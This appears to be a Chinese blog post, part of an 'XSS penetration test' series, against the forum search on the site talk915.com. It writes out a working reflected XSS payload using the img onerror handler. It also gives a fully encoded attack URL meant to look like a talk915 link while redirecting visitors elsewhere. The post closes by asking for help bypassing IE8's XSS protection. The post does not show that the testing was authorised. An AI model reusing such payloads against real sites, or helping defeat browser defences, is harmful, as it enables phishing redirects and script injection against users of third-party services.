xss渗透试验(3)

工具:appscan

站点:www.talk915.com

浏览器:IE8,firefox

方法:<img> onerror方法



浏览器不能够直接执行,这种通过第二次点击来实现渗透,效率非常低,最好是给出一个url,本来以为是进入talk915的,却自动跳转到另外一个网站。

应该怎么做呢?其中在本例中,我们用得最多的标签的就是<a>, <img>,我们到www.w3school.com.cn看一下它们的手册,发现<img>的onerror对象句柄没有使用。

http://www.w3school.com.cn/jsref/dom_obj_image.asp

 

假如,我们在

http://www.talk915.com/forum/forum_community.action

的搜索框里填入

1234"><img src=@onerror=window.location.assign("http://www.bing.com")>

结果会怎样?

 

因为<img>引用src的位置@,是不存在,按照手册来说,它会执行onerror这一段。也就是把浏览器地址栏输入

http://www.bing.com

 

用IE8,firefox来尝试,都能够跳转到bing

 

拼接url

http://www.talk915.com/forum/forum_community.action?struts.token.name=token&token=G2TQIXRNK8P5ZD8YNR6A2YHST2P0JU7W&title=&author=&content=&titles=&titleType=&forumId=&orderBy=&excellent=&selectTitle=&page.currentPage=1&postForumId=&postContent=&postAdd=&postId=&oldForumId=&openPost=&postAudio=&postAudioLength=&postStatus=&img_url_length=64&expression_url_length=46&upload_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsUpload&download_url=http%3A%2F%2Fwww.talk915.com%3A13148%2FresourceProxy%2FfdfsDownload%3FFILE_ID%3D&pathUrl=http%3A%2F%2Fwww.talk915.com%3A80%2F&userToken=&searchWhere=1234%22%3e%3cimg+src%3d%40+onerror%3dwindow.location.assign(%22http%3a%2f%2fwww.bing.com%22)%3e&forumListId=4&selectForumId=1&postTitle=1234

 

但IE8仍然会报错无法跳转,firefox没问题。

希望牛人帮忙看看怎么突破IE8这个报错。谢谢。

你可能感兴趣的:(ie8,firefox,xss)